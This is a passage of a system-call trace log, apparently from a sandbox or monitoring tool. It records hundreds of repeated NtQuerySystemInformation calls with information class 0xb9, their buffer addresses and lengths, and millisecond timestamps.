ResultLength=0x0) [0303.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0f0, Length=0x40, ResultLength=0x0) [0303.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 